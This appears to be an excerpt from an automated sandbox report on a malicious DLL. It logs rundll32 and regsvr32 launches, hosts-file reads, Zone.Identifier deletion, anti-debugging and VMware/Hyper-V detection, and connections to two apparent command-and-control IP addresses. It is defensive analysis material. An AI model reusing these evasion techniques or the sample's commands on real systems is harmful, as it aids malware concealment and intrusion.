                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000C.00000003.690087047.00000000050A8000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.690035610.00000000050A8000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 0000000C.00000003.690087047.00000000050A8000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.690035610.00000000050A8000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000C.00000003.690016082.00000000050D1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000C.00000003.685499614.0000000004D25000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.685556011.0000000003291000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.690016082.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.685774449.0000000003291000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000C.00000003.690087047.00000000050A8000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.690035610.00000000050A8000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000C.00000003.690025139.00000000050A2000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000C.00000003.690087047.00000000050A8000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.690035610.00000000050A8000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000C.00000003.690016082.00000000050D1000.00000004.00000001.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000C.00000003.690016082.00000000050D1000.00000004.00000001.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 0000000C.00000003.690087047.00000000050A8000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.690035610.00000000050A8000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000C.00000003.690080981.00000000050A5000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.690025139.00000000050A2000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000C.00000003.685541913.000000000328C000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.690016082.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.686171794.000000000328C000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000C.00000003.690080981.00000000050A5000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.690025139.00000000050A2000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000C.00000003.690087047.00000000050A8000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.690035610.00000000050A8000.00000004.00000040.sdmp
                      Source: Binary string: a,njr/nCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000C.00000002.702514723.0000000000C92000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000C.00000003.690016082.00000000050D1000.00000004.00000001.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000C.00000003.690016082.00000000050D1000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000C.00000003.690074916.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000C.00000003.690074916.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000C.00000003.690016082.00000000050D1000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000C.00000003.690074916.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000C.00000003.690087047.00000000050A8000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.690035610.00000000050A8000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000C.00000003.685885045.0000000003297000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.685567908.0000000003297000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.685783143.0000000003297000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.690016082.00000000050D1000.00000004.00000001.sdmp
                      Source: Binary string: sechost.pdbk source: WerFault.exe, 0000000C.00000003.690025139.00000000050A2000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000C.00000003.685885045.0000000003297000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.685567908.0000000003297000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.685783143.0000000003297000.00000004.00000001.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000C.00000003.690074916.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000C.00000003.690074916.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000C.00000003.690087047.00000000050A8000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.690035610.00000000050A8000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000C.00000003.690016082.00000000050D1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000C.00000003.685556011.0000000003291000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.685774449.0000000003291000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000C.00000003.690087047.00000000050A8000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.690035610.00000000050A8000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000C.00000003.690016082.00000000050D1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000C.00000003.690016082.00000000050D1000.00000004.00000001.sdmp
                      Source: Binary string: Kernel.Appcore.pdb^;V source: WerFault.exe, 0000000C.00000003.690074916.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000C.00000003.685541913.000000000328C000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.686171794.000000000328C000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AE1195 push cs; iretd 0_2_02AE1197
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1003060D push ecx; ret 2_2_10030620
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003060D push ecx; ret 3_2_10030620
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10030E7D push ecx; ret 3_2_10030E90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1003060D push ecx; ret 4_2_10030620
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10030E7D push ecx; ret 4_2_10030E90
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1003E278 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,2_2_1003E278
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\YBfn5E3Dlw.dll
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Dfktehrjwgeevy\pakqi.bjaJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ytghf\cgnbs.rer:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Dfktehrjwgeevy\pakqi.bja:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100250A3 IsIconic,GetWindowPlacement,GetWindowRect,2_2_100250A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100250A3 IsIconic,GetWindowPlacement,GetWindowRect,3_2_100250A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001DFC0 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,3_2_1001DFC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100250A3 IsIconic,GetWindowPlacement,GetWindowRect,4_2_100250A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001DFC0 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,4_2_1001DFC0
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 5636Thread sleep time: -180000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-17581
                      Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_3-21435
                      Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 4.9 %
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 5.2 %
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 5.4 %
                      Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_2-17583
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-21136
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_4-21136
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_4-21756
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: Amcache.hve.12.drBinary or memory string: VMware
                      Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: Amcache.hve.12.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.12.drBinary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
                      Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.
                      Source: svchost.exe, 00000013.00000002.823902052.000002EBAE6F8000.00000004.00000001.sdmpBinary or memory string: (@Hyper-V RAW
                      Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                      Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.12.drBinary or memory string: VMware7,1
                      Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: svchost.exe, 00000013.00000002.823886227.000002EBAE6E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.me
                      Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: svchost.exe, 00000013.00000002.823744367.000002EBAE687000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW`
                      Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002DB0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_1002DB0D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1003E278 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,2_2_1003E278
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10002D40 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,2_2_10002D40
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AEF7F7 mov eax, dword ptr fs:[00000030h]0_2_02AEF7F7
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AEC6B8 LdrInitializeThunk,0_2_02AEC6B8
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1003A8D4 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_1003A8D4
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002DB0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_1002DB0D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10032CB9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_10032CB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003A8D4 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_1003A8D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002DB0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_1002DB0D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10032CB9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_10032CB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1003A8D4 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_1003A8D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002DB0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_1002DB0D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10032CB9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_10032CB9

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 69.16.218.101 144Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.138.98.34 80Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\YBfn5E3Dlw.dll",#1Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6260 -ip 6260Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 552Jump to behavior
                      Source: loaddll32.exe, 00000000.00000000.678909155.00000000015A0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.679921964.00000000015A0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000000.678909155.00000000015A0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.679921964.00000000015A0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000000.678909155.00000000015A0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.679921964.00000000015A0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000000.678909155.00000000015A0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.679921964.00000000015A0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,2_2_1003E000
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,2_2_1003D098
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,2_2_1002129B
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,2_2_1003D35E
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,2_2_1003850E
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,2_2_1003D7AE
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_1003C7D2
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,2_2_1003D8C5
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,2_2_1003D95D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,2_2_1003D9D1
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,2_2_1003F9F4
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,2_2_1003EA86
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,2_2_1003EABA
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,2_2_1003DBA3
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_1003EBF9
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_1003DC64
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_1003DCCB
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,2_2_1003DD07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,3_2_1003E000
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,3_2_1003D098
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,3_2_1002129B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,3_2_1003D35E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,3_2_1003850E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,3_2_1003D7AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_1003C7D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,3_2_1003D8C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,3_2_1003D95D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_1003D9D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,3_2_1003F9F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,3_2_1003EA86
